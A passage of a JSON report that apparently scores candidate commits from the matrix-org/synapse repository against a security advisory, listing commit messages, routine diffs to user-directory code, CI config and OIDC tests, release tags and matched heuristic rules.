shorthand=False," + ], + "changed_files": [ + "tests/rest/client/v2_alpha/test_account.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: request", + "relevance": 4 + } + ] + }, + { + "commit_id": "4d17afc255e13aab2806a78c970566b8c2de0484", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607697662, + "hunks": 2, + "message": "Fix users info for remote users (#71)", + "diff": [ + "diff --git a/changelog.d/71.bugfix b/changelog.d/71.bugfix", + "new file mode 100644", + "index 000000000..cad69c7bd", + "--- /dev/null", + "+++ b/changelog.d/71.bugfix", + "@@ -0,0 +1 @@", + "+Fix users info for remote users.", + "diff --git a/synapse/rest/client/v2_alpha/user_directory.py b/synapse/rest/client/v2_alpha/user_directory.py", + "index 5d4be8ada..eeddfa31f 100644", + "--- a/synapse/rest/client/v2_alpha/user_directory.py", + "+++ b/synapse/rest/client/v2_alpha/user_directory.py", + "@@ -209,4 +209,3 @@ class UserInfoServlet(RestServlet):", + "- for user_id, info in res:", + "- user_id_to_info_dict[user_id] = info", + "+ user_id_to_info_dict.update(res)" + ], + "changed_files": [ + "changelog.d/71.bugfix", + "synapse/rest/client/v2_alpha/user_directory.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "71": "" + }, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [ + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 71", + "relevance": 2 + } + ] + }, + { + "commit_id": "ed61fe4ada10eabf66bb4a5c60f2ccca540d1c6e", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608045728, + "hunks": 1, + "message": "changelog", + "diff": [ + "diff --git a/changelog.d/8946.misc b/changelog.d/8946.misc", + "new file mode 100644", + "index 000000000..54502e9b9", + "--- /dev/null", + "+++ b/changelog.d/8946.misc", + "@@ -0,0 +1 @@", + "+Refactor test utilities for injecting HTTP requests." + ], + "changed_files": [ + "changelog.d/8946.misc" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "757b5a0bf6704885b267670c9be4a57d8ff47c30" + ] + ], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + } + ] + }, + { + "commit_id": "cb7e610136a5bd689504395181de1fe069db8187", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607530079, + "hunks": 3, + "message": "Tweak CircleCI config to trigger rebuild of v1.23.1", + "diff": [ + "diff --git a/.circleci/config.yml b/.circleci/config.yml", + "index 088da5573..874f2f765 100644", + "--- a/.circleci/config.yml", + "+++ b/.circleci/config.yml", + "@@ -10,21 +10,5 @@ jobs:", + " - docker_build:", + "- tag: -t matrixdotorg/synapse:${CIRCLE_TAG}", + "- platforms: linux/amd64", + "- - docker_build:", + "- tag: -t matrixdotorg/synapse:${CIRCLE_TAG}", + "+ tag: -t matrixdotorg/synapse:v1.23.1", + " platforms: linux/amd64,linux/arm/v7,linux/arm64", + "- dockerhubuploadlatest:", + "- docker:", + "- - image: docker:git", + "- steps:", + "- - checkout", + "- - docker_prepare", + "- - run: docker login --username $DOCKER_HUB_USERNAME --password $DOCKER_HUB_PASSWORD", + "- - docker_build:", + "- tag: -t matrixdotorg/synapse:latest", + "- platforms: linux/amd64", + "- - docker_build:", + "- tag: -t matrixdotorg/synapse:latest", + "- platforms: linux/amd64,linux/arm/v7,linux/arm64", + "@@ -33,12 +17,3 @@ workflows:", + " jobs:", + "- - dockerhubuploadrelease:", + "- filters:", + "- tags:", + "- only: /v[0-9].[0-9]+.[0-9]+.*/", + "- branches:", + "- ignore: /.*/", + "- - dockerhubuploadlatest:", + "- filters:", + "- branches:", + "- only: master", + "+ - dockerhubuploadrelease" + ], + "changed_files": [ + ".circleci/config.yml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [] + }, + { + "commit_id": "da4050bb8c6cc6bf4c71390a08bf94e1c1b946f3", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607529888, + "hunks": 0, + "message": "Merge branch 'rav/fix_multiarch_builds' into rav/v1.24.0-multiarch", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [] + }, + { + "commit_id": "a4a5c7a35e3231f0a7ad799e0d2fce8c3e69603b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607530432, + "hunks": 0, + "message": "Merge remote-tracking branch 'origin/master' into develop", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "cf7d3c90d6e8bcc2fd196d93c13b5c507ef229b5", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607529672, + "hunks": 0, + "message": "Merge branch 'release-v1.24.0' into develop", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "0825299cfcf61079f78b7a6c5e31f5df078c291a", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608130193, + "hunks": 0, + "message": "Merge remote-tracking branch 'origin/release-v1.24.0' into bbz/info-mainline-1.24.0", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [] + }, + { + "commit_id": "2dd2e90e2b0b78f82d0e3372bacba9a84240302b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608035996, + "hunks": 14, + "message": "Test `get_extra_attributes` fallback despite the warnings saying \"don't implement get_extra_attributes\", we had implemented it, so the tests weren't doing what we thought they were.", + "diff": [ + "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", + "index 464e569ac..1794a169e 100644", + "--- a/tests/handlers/test_oidc.py", + "+++ b/tests/handlers/test_oidc.py", + "@@ -21,3 +21,3 @@ import pymacaroons", + "-from synapse.handlers.oidc_handler import OidcError, OidcMappingProvider", + "+from synapse.handlers.oidc_handler import OidcError", + " from synapse.handlers.sso import MappingException", + "@@ -57,3 +57,3 @@ COOKIE_PATH = \"/_synapse/oidc\"", + "-class TestMappingProvider(OidcMappingProvider):", + "+class TestMappingProvider:", + " @staticmethod", + "@@ -62,2 +62,5 @@ class TestMappingProvider(OidcMappingProvider):", + "+ def __init__(self, config):", + "+ pass", + "+", + " def get_remote_user_id(self, userinfo):", + "@@ -362,2 +365,9 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " \"\"\"", + "+", + "+ # ensure that we are correctly testing the fallback when \"get_extra_attributes\"", + "+ # is not implemented.", + "+ mapping_provider = self.handler._user_mapping_provider", + "+ with self.assertRaises(AttributeError):", + "+ _ = mapping_provider.get_extra_attributes", + "+", + " token = {", + "@@ -398,3 +408,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- expected_user_id, request, client_redirect_url, {},", + "+ expected_user_id, request, client_redirect_url, None,", + " )", + "@@ -429,3 +439,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- expected_user_id, request, client_redirect_url, {},", + "+ expected_user_id, request, client_redirect_url, None,", + " )", + "@@ -618,3 +628,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- \"@test_user:test\", ANY, ANY, {}", + "+ \"@test_user:test\", ANY, ANY, None,", + " )", + "@@ -629,3 +639,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- \"@test_user_2:test\", ANY, ANY, {}", + "+ \"@test_user_2:test\", ANY, ANY, None,", + " )", + "@@ -666,3 +676,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- user.to_string(), ANY, ANY, {},", + "+ user.to_string(), ANY, ANY, None,", + " )", + "@@ -673,3 +683,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- user.to_string(), ANY, ANY, {},", + "+ user.to_string(), ANY, ANY, None,", + " )", + "@@ -688,3 +698,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- user.to_string(), ANY, ANY, {},", + "+ user.to_string(), ANY, ANY, None,", + " )", + "@@ -724,3 +734,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- \"@TEST_USER_2:test\", ANY, ANY, {},", + "+ \"@TEST_USER_2:test\", ANY, ANY, None,", + " )", + "@@ -758,3 +768,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- \"@test_user1:test\", ANY, ANY, {},", + "+ \"@test_user1:test\", ANY, ANY, None,", + " )", + "diff --git a/tests/rest/client/v1/utils.py b/tests/rest/client/v1/utils.py", + "index 5a18af8d3..1b3166948 100644", + "--- a/tests/rest/client/v1/utils.py", + "+++ b/tests/rest/client/v1/utils.py", + "@@ -447,3 +447,3 @@ class RestHelper:", + "-# an 'oidc_config' suitable for login_with_oidc.", + "+# an 'oidc_config' suitable for login_via_oidc.", + " TEST_OIDC_CONFIG = {" + ], + "changed_files": [ + "tests/handlers/test_oidc.py", + "tests/rest/client/v1/utils.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + 